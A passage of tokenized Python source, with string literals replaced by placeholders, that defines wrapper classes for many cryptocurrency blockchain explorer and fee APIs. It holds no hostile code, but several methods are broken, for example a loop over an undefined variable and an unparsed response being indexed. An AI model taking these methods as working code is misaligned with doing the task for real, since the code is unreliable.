currency_to_protocol ( utxo [ '<STR_LIT:value>' ] ) , <EOL> address = address , <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT>' ] ) , <EOL> confirmations = utxo [ '<STR_LIT>' ] <EOL> ) ) <EOL> return utxos <EOL> def push_tx ( self , crypto , tx_hex ) : <EOL> url = "<STR_LIT>" % ( self . base_url , crypto ) <EOL> resp = self . post_url ( url , { '<STR_LIT>' : tx_hex } ) <EOL> return resp . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] <EOL> def get_block ( self , crypto , block_number = '<STR_LIT>' , block_hash = '<STR_LIT>' , latest = False ) : <EOL> if latest : <EOL> raise SkipThisService ( "<STR_LIT>" ) <EOL> else : <EOL> url = "<STR_LIT>" % ( <EOL> self . base_url , crypto , block_number , block_hash <EOL> ) <EOL> r = self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] <EOL> return dict ( <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> confirmations = r [ '<STR_LIT>' ] , <EOL> time = arrow . get ( r [ '<STR_LIT:time>' ] ) . datetime , <EOL> sent_value = float ( r [ '<STR_LIT>' ] ) , <EOL> total_fees = float ( r [ '<STR_LIT>' ] ) , <EOL> mining_difficulty = float ( r [ '<STR_LIT>' ] ) , <EOL> size = r [ '<STR_LIT:size>' ] , <EOL> hash = r [ '<STR_LIT>' ] , <EOL> merkle_root = r [ '<STR_LIT>' ] , <EOL> previous_hash = r [ '<STR_LIT>' ] , <EOL> next_hash = r [ '<STR_LIT>' ] , <EOL> txids = sorted ( [ t [ '<STR_LIT>' ] for t in r [ '<STR_LIT>' ] ] ) <EOL> ) <EOL> class CoinPrism ( Service ) : <EOL> service_id = <NUM_LIT:12> <EOL> api_homepage = "<STR_LIT>" <EOL> base_url = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = None ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> resp = self . get_url ( url ) . json ( ) <EOL> return resp [ '<STR_LIT>' ] / <NUM_LIT> <EOL> def get_transactions ( self , crypto , address ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> transactions = [ ] <EOL> for tx in self . get_url ( url ) . json ( ) : <EOL> transactions . append ( dict ( <EOL> amount = sum ( [ x [ '<STR_LIT:value>' ] / <NUM_LIT> for x in tx [ '<STR_LIT>' ] if address in x [ '<STR_LIT>' ] ] ) , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> date = arrow . get ( tx [ '<STR_LIT>' ] ) . datetime , <EOL> confirmations = tx [ '<STR_LIT>' ] <EOL> ) ) <EOL> return transactions <EOL> def get_unspent_outputs ( self , crypto , address ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> transactions = [ ] <EOL> for tx in self . get_url ( url ) . json ( ) : <EOL> if address in tx [ '<STR_LIT>' ] : <EOL> transactions . append ( dict ( <EOL> amount = tx [ '<STR_LIT:value>' ] , <EOL> address = address , <EOL> output = "<STR_LIT>" % ( tx [ '<STR_LIT>' ] , tx [ '<STR_LIT>' ] ) , <EOL> confirmations = tx [ '<STR_LIT>' ] <EOL> ) ) <EOL> return transactions <EOL> def push_tx ( self , crypto , tx_hex ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" <EOL> return self . post_url ( url , tx_hex ) . content <EOL> class BitEasy ( Service ) : <EOL> """<STR_LIT>""" <EOL> service_id = <NUM_LIT> <EOL> api_homepage = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" + address <EOL> response = self . get_url ( url ) <EOL> return response . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] / <NUM_LIT> <EOL> class BlockChainInfo ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> domain = "<STR_LIT>" <EOL> api_homepage = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_blocknum_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . domain , address ) <EOL> response = self . get_url ( url ) <EOL> return float ( response . json ( ) [ '<STR_LIT>' ] ) * <NUM_LIT> <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . domain , address ) <EOL> response = self . get_url ( url ) <EOL> if response . content == '<STR_LIT>' : <EOL> return [ ] <EOL> utxos = [ ] <EOL> for utxo in response . json ( ) [ '<STR_LIT>' ] : <EOL> if utxo [ '<STR_LIT>' ] < confirmations : <EOL> continue <EOL> utxos . append ( dict ( <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT>' ] ) , <EOL> amount = utxo [ '<STR_LIT:value>' ] , <EOL> address = address , <EOL> ) ) <EOL> return utxos <EOL> class BitcoinAbe ( Service ) : <EOL> service_id = <NUM_LIT:15> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> base_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . base_url + "<STR_LIT>" + address <EOL> response = self . get_url ( url ) <EOL> return float ( response . content ) <EOL> class DogeChainInfo ( BitcoinAbe ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> base_url = "<STR_LIT>" <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class AuroraCoinEU ( BitcoinAbe ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> base_url = '<STR_LIT>' <EOL> name = "<STR_LIT>" <EOL> class Atorox ( BitcoinAbe ) : <EOL> service_id = <NUM_LIT:20> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> base_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class FeathercoinCom ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % address <EOL> response = self . get_url ( url ) <EOL> return float ( response . json ( ) [ '<STR_LIT>' ] ) <EOL> class NXTPortal ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = '<STR_LIT>' + address <EOL> response = self . get_url ( url ) <EOL> return float ( response . json ( ) [ '<STR_LIT>' ] ) * <NUM_LIT> <EOL> def get_transactions ( self , crypto , address ) : <EOL> url = '<STR_LIT>' % address <EOL> response = self . get_url ( url ) <EOL> transactions = [ ] <EOL> for tx in txs : <EOL> transactions . append ( dict ( <EOL> date = arrow . get ( tx [ '<STR_LIT:time>' ] ) . datetime , <EOL> amount = tx [ '<STR_LIT:value>' ] , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> confirmations = tx [ '<STR_LIT>' ] , <EOL> ) ) <EOL> return transactions <EOL> class CryptoID ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> api_key = "<STR_LIT>" <EOL> supported_cryptos = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:key>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( <EOL> crypto , address , self . api_key <EOL> ) <EOL> return float ( self . get_url ( url ) . content ) <EOL> def get_single_transaction ( self , crypto , txid ) : <EOL> url = "<STR_LIT>" % ( <EOL> crypto , txid , self . api_key <EOL> ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> time = arrow . get ( r [ '<STR_LIT>' ] ) . datetime , <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> inputs = [ { '<STR_LIT:address>' : x [ '<STR_LIT>' ] , '<STR_LIT>' : x [ '<STR_LIT>' ] } for x in r [ '<STR_LIT>' ] ] , <EOL> outputs = [ { '<STR_LIT:address>' : x [ '<STR_LIT>' ] , '<STR_LIT>' : x [ '<STR_LIT>' ] } for x in r [ '<STR_LIT>' ] ] , <EOL> txid = txid , <EOL> total_in = r [ '<STR_LIT>' ] , <EOL> total_out = r [ '<STR_LIT>' ] , <EOL> confirmations = r [ '<STR_LIT>' ] , <EOL> ) <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( <EOL> crypto , address , self . api_key <EOL> ) <EOL> resp = self . get_url ( url ) <EOL> if resp . status_code != <NUM_LIT:200> : <EOL> raise Exception ( "<STR_LIT>" % resp . content ) <EOL> ret = [ ] <EOL> for utxo in resp . json ( ) [ '<STR_LIT>' ] : <EOL> ret . append ( dict ( <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT>' ] ) , <EOL> amount = int ( utxo [ '<STR_LIT:value>' ] ) , <EOL> confirmations = utxo [ '<STR_LIT>' ] , <EOL> address = address <EOL> ) ) <EOL> return ret <EOL> class CryptapUS ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> supported_cryptos = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( crypto , address ) <EOL> return float ( self . get_url ( url ) . content ) <EOL> class BTER ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_current_price ( self , crypto , fiat ) : <EOL> url_template = "<STR_LIT>" <EOL> url = url_template % ( crypto , fiat ) <EOL> response = self . get_url ( url ) . json ( ) <EOL> if response [ '<STR_LIT:result>' ] == '<STR_LIT:false>' : <EOL> url = url_template % ( crypto , '<STR_LIT>' ) <EOL> response = self . get_url ( url ) <EOL> altcoin_btc = float ( response [ '<STR_LIT>' ] ) <EOL> url = url_template % ( '<STR_LIT>' , fiat ) <EOL> response = self . get_url ( url ) <EOL> btc_fiat = float ( response [ '<STR_LIT>' ] ) <EOL> self . name = '<STR_LIT>' <EOL> return ( btc_fiat * altcoin_btc ) <EOL> return float ( response [ '<STR_LIT>' ] or <NUM_LIT:0> ) <EOL> class BitpayInsight ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> domain = "<STR_LIT>" <EOL> protocol = '<STR_LIT>' <EOL> api_homepage = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , address ) <EOL> return float ( self . get_url ( url ) . content ) / <NUM_LIT> <EOL> def _format_tx ( self , tx , addresses ) : <EOL> matched_addresses = [ ] <EOL> my_outs = <NUM_LIT:0> <EOL> my_ins = <NUM_LIT:0> <EOL> for address in addresses : <EOL> for x in tx [ '<STR_LIT>' ] : <EOL> if address in x [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> my_outs += float ( x [ '<STR_LIT:value>' ] ) <EOL> matched_addresses . append ( address ) <EOL> for x in tx [ '<STR_LIT>' ] : <EOL> if address in x [ '<STR_LIT>' ] : <EOL> my_ins += float ( x [ '<STR_LIT:value>' ] ) <EOL> matched_addresses . append ( address ) <EOL> return dict ( <EOL> amount = my_outs - my_ins , <EOL> date = arrow . get ( tx [ '<STR_LIT:time>' ] ) . datetime , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> confirmations = tx [ '<STR_LIT>' ] , <EOL> addresses = list ( set ( matched_addresses ) ) <EOL> ) <EOL> def get_transactions ( self , crypto , address ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , address ) <EOL> response = self . get_url ( url ) <EOL> transactions = [ ] <EOL> for tx in response . json ( ) [ '<STR_LIT>' ] : <EOL> transactions . append ( self . _format_tx ( tx , [ address ] ) ) <EOL> return transactions <EOL> def get_transactions_multi ( self , crypto , addresses ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , '<STR_LIT:U+002C>' . join ( addresses ) ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> txs = [ ] <EOL> for tx in r [ '<STR_LIT>' ] : <EOL> txs . append ( self . _format_tx ( tx , addresses ) ) <EOL> return txs <EOL> def get_single_transaction ( self , crypto , txid ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , txid ) <EOL> d = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> time = arrow . get ( d [ '<STR_LIT>' ] ) . datetime , <EOL> confirmations = d [ '<STR_LIT>' ] , <EOL> total_in = float ( d [ '<STR_LIT>' ] ) , <EOL> total_out = float ( d [ '<STR_LIT>' ] ) , <EOL> fee = d [ '<STR_LIT>' ] , <EOL> inputs = [ { '<STR_LIT:address>' : x [ '<STR_LIT>' ] , '<STR_LIT:value>' : x [ '<STR_LIT:value>' ] } for x in d [ '<STR_LIT>' ] ] , <EOL> outputs = [ { '<STR_LIT:address>' : x [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , '<STR_LIT:value>' : x [ '<STR_LIT:value>' ] } for x in d [ '<STR_LIT>' ] ] , <EOL> txid = txid , <EOL> ) <EOL> def _format_utxo ( self , utxo ) : <EOL> return dict ( <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT>' ] ) , <EOL> amount = currency_to_protocol ( utxo [ '<STR_LIT>' ] ) , <EOL> confirmations = utxo [ '<STR_LIT>' ] , <EOL> address = utxo [ '<STR_LIT:address>' ] <EOL> ) <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , address ) <EOL> utxos = [ ] <EOL> for utxo in self . get_url ( url ) . json ( ) : <EOL> utxos . append ( self . _format_utxo ( utxo ) ) <EOL> return utxos <EOL> def get_unspent_outputs_multi ( self , crypto , addresses , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , '<STR_LIT:U+002C>' . join ( addresses ) ) <EOL> utxos = [ ] <EOL> for utxo in self . get_url ( url ) . json ( ) : <EOL> utxos . append ( self . _format_utxo ( utxo ) ) <EOL> return utxos <EOL> def get_block ( self , crypto , block_number = '<STR_LIT>' , block_hash = '<STR_LIT>' , latest = False ) : <EOL> if latest : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain ) <EOL> block_hash = self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] <EOL> elif block_number : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , block_number ) <EOL> block_hash = self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , block_hash ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> version = r [ '<STR_LIT:version>' ] , <EOL> confirmations = r [ '<STR_LIT>' ] , <EOL> time = arrow . get ( r [ '<STR_LIT:time>' ] ) . datetime , <EOL> mining_difficulty = float ( r [ '<STR_LIT>' ] ) , <EOL> size = r [ '<STR_LIT:size>' ] , <EOL> hash = r [ '<STR_LIT>' ] , <EOL> merkle_root = r [ '<STR_LIT>' ] , <EOL> previous_hash = r [ '<STR_LIT>' ] , <EOL> next_hash = r . get ( '<STR_LIT>' , None ) , <EOL> txids = r [ '<STR_LIT>' ] , <EOL> tx_count = len ( r [ '<STR_LIT>' ] ) <EOL> ) <EOL> def push_tx ( self , crypto , tx_hex ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain ) <EOL> return self . post_url ( url , { '<STR_LIT>' : tx_hex } ) . json ( ) [ '<STR_LIT>' ] <EOL> def get_optimal_fee ( self , crypto , tx_bytes ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain ) <EOL> return self . get_url ( url ) . json ( ) <EOL> class MYRCryptap ( BitpayInsight ) : <EOL> service_id = <NUM_LIT:30> <EOL> protocol = '<STR_LIT:http>' <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class BirdOnWheels ( BitpayInsight ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class ThisIsVTC ( BitpayInsight ) : <EOL> service_id = <NUM_LIT:32> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class ReddcoinCom ( BitpayInsight ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class CoinTape ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> api_homepage = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> base_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_optimal_fee ( self , crypto , tx_bytes ) : <EOL> url = self . base_url + "<STR_LIT>" <EOL> response = self . get_url ( url ) . json ( ) <EOL> return int ( response [ '<STR_LIT>' ] * tx_bytes ) <EOL> class BitGo ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> api_homepage = '<STR_LIT>' <EOL> name = "<STR_LIT>" <EOL> base_url = "<STR_LIT>" <EOL> optimalFeeNumBlocks = <NUM_LIT:1> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> response = self . get_url ( url ) . json ( ) <EOL> if confirmations == <NUM_LIT:0> : <EOL> return response [ '<STR_LIT>' ] / <NUM_LIT> <EOL> if confirmations == <NUM_LIT:1> : <EOL> return response [ '<STR_LIT>' ] / <NUM_LIT> <EOL> else : <EOL> raise SkipThisService ( '<STR_LIT>' ) <EOL> def get_transactions ( self , crypto , address ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> response = self . get_url ( url ) . json ( ) <EOL> txs = [ ] <EOL> for tx in response [ '<STR_LIT>' ] : <EOL> my_outs = [ x [ '<STR_LIT:value>' ] for x in tx [ '<STR_LIT>' ] if x [ '<STR_LIT>' ] == address ] <EOL> txs . append ( dict ( <EOL> amount = sum ( my_outs ) , <EOL> date = arrow . get ( tx [ '<STR_LIT:date>' ] ) . datetime , <EOL> txid = tx [ '<STR_LIT:id>' ] , <EOL> confirmations = tx [ '<STR_LIT>' ] , <EOL> ) ) <EOL> return txs <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> utxos = [ ] <EOL> for utxo in self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] : <EOL> utxos . append ( dict ( <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT>' ] ) , <EOL> amount = utxo [ '<STR_LIT:value>' ] , <EOL> confirmations = utxo [ '<STR_LIT>' ] , <EOL> address = address <EOL> ) ) <EOL> return utxos <EOL> def get_block ( self , crypto , block_number = '<STR_LIT>' , block_hash = '<STR_LIT>' , latest = False ) : <EOL> if latest : <EOL> url = "<STR_LIT>" <EOL> else : <EOL> url = "<STR_LIT>" + block_number + block_hash <EOL> r = self . get_url ( self . base_url + url ) <EOL> return dict ( <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> time = arrow . get ( r [ '<STR_LIT:date>' ] ) . datetime , <EOL> hash = r [ '<STR_LIT:id>' ] , <EOL> previous_hash = r [ '<STR_LIT>' ] , <EOL> txids = r [ '<STR_LIT>' ] , <EOL> tx_count = len ( r [ '<STR_LIT>' ] ) <EOL> ) <EOL> def get_optimal_fee ( self , crypto , tx_bytes ) : <EOL> url = "<STR_LIT>" % ( self . base_url , self . optimalFeeNumBlocks ) <EOL> response = self . get_url ( url ) . json ( ) <EOL> fee_kb = response [ '<STR_LIT>' ] <EOL> return int ( tx_bytes * fee_kb / <NUM_LIT> ) <EOL> class Blockonomics ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> return self . get_balance_multi ( crypto , [ address ] , confirmations ) [ address ] <EOL> def get_balance_multi ( self , crypto , addresses , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" <EOL> if hasattr ( addresses , '<STR_LIT>' ) and addresses . startswith ( "<STR_LIT>" ) : <EOL> body = { '<STR_LIT>' : addresses } <EOL> else : <EOL> body = { '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( addresses ) } <EOL> response = self . post_url ( url , json . dumps ( body ) ) . json ( ) <EOL> balances = { } <EOL> for data in response [ '<STR_LIT>' ] : <EOL> confirmed = data [ '<STR_LIT>' ] / <NUM_LIT> <EOL> if confirmations == <NUM_LIT:0> : <EOL> balance = confirmed + ( data [ '<STR_LIT>' ] / <NUM_LIT> ) <EOL> if confirmations == <NUM_LIT:1> : <EOL> balance = confirmed <EOL> else : <EOL> raise SkipThisService ( "<STR_LIT>" ) <EOL> balances [ data [ '<STR_LIT>' ] ] = balance <EOL> return balances <EOL> def get_transactions ( self , crypto , address ) : <EOL> url = "<STR_LIT>" <EOL> response = self . post_url ( url , json . dumps ( { '<STR_LIT>' : address } ) ) . json ( ) <EOL> txs = [ ] <EOL> for tx in response [ '<STR_LIT>' ] : <EOL> txs . append ( dict ( <EOL> amount = tx [ '<STR_LIT:value>' ] / <NUM_LIT> , <EOL> date = arrow . get ( tx [ '<STR_LIT:time>' ] ) . datetime , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> ) ) <EOL> return txs <EOL> class BlockExplorerCom ( BitpayInsight ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class BitNodes ( Service ) : <EOL> domain = "<STR_LIT>" <EOL> service_id = <NUM_LIT> <EOL> name = "<STR_LIT>" <EOL> def get_nodes ( self , crypto ) : <EOL> response = self . get_url ( self . domain + "<STR_LIT>" ) <EOL> nodes_dict = response . json ( ) [ '<STR_LIT>' ] <EOL> nodes = [ ] <EOL> for address , data in nodes_dict . items ( ) : <EOL> nodes . append ( { <EOL> '<STR_LIT:address>' : address , <EOL> '<STR_LIT>' : data [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : arrow . get ( data [ <NUM_LIT:2> ] ) . datetime , <EOL> '<STR_LIT>' : data [ <NUM_LIT:3> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:4> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:5> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:6> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:7> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:8> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:9> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:10> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:11> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:12> ] <EOL> } ) <EOL> return nodes <EOL> class BitcoinFees21 ( CoinTape ) : <EOL> base_url = "<STR_LIT>" <EOL> service_id = <NUM_LIT> <EOL> name = "<STR_LIT>" <EOL> api_homepage = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> class ChainRadar ( Service ) : <EOL> api_homepage = "<STR_LIT>" <EOL> service_id = <NUM_LIT> <EOL> name = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def get_block ( self , crypto , block_number = '<STR_LIT>' , block_hash = '<STR_LIT>' , latest = False ) : <EOL> if latest : <EOL> url = "<STR_LIT>" % crypto <EOL> block_number = self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] <EOL> url = "<STR_LIT>" % ( crypto , block_number or block_hash ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> h = r [ '<STR_LIT>' ] <EOL> return dict ( <EOL> block_number = h [ '<STR_LIT>' ] , <EOL> time = arrow . get ( h [ '<STR_LIT>' ] ) . datetime , <EOL> size = h [ '<STR_LIT>' ] , <EOL> hash = h [ '<STR_LIT>' ] , <EOL> previous_hash = h [ '<STR_LIT>' ] , <EOL> txids = [ x [ '<STR_LIT>' ] for x in r [ '<STR_LIT>' ] ] , <EOL> tx_count = len ( r [ '<STR_LIT>' ] ) <EOL> ) <EOL> class Mintr ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> name = "<STR_LIT>" <EOL> domain = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_blocknum_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> @ classmethod <EOL> def _get_coin ( cls , crypto ) : <EOL> if crypto == '<STR_LIT>' : <EOL> return '<STR_LIT>' <EOL> if crypto == '<STR_LIT>' : <EOL> return '<STR_LIT>' <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( <EOL> self . domain . format ( coin = self . _get_coin ( crypto ) ) , address <EOL> ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> if '<STR_LIT:error>' in r : <EOL> raise Exception ( "<STR_LIT>" % r [ '<STR_LIT:error>' ] ) <EOL> return float ( r [ '<STR_LIT>' ] ) <EOL> def get_single_transaction ( self , crypto , txid ) : <EOL> url = "<STR_LIT>" % ( <EOL> self . domain . format ( coin = self . _get_coin ( crypto ) ) , txid <EOL> ) <EOL> d = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> time = arrow . get ( d [ '<STR_LIT:time>' ] ) . datetime , <EOL> total_in = float ( d [ '<STR_LIT>' ] ) , <EOL> total_out = float ( d [ '<STR_LIT>' ] ) , <EOL> fee = float ( d [ '<STR_LIT>' ] ) , <EOL> inputs = [ { '<STR_LIT:address>' : x [ '<STR_LIT:address>' ] , '<STR_LIT:value>' : x [ '<STR_LIT:value>' ] } for x in d [ '<STR_LIT>' ] ] , <EOL> outputs = [ { '<STR_LIT:address>' : x [ '<STR_LIT:address>' ] , '<STR_LIT:value>' : x [ '<STR_LIT:value>' ] } for x in d [ '<STR_LIT>' ] ] , <EOL> txid = txid , <EOL> ) <EOL> def get_block ( self , crypto , block_number = '<STR_LIT>' , block_hash = '<STR_LIT>' , latest = False ) : <EOL> if block_number : <EOL> by = "<STR_LIT>" <EOL> elif block_hash : <EOL> by = 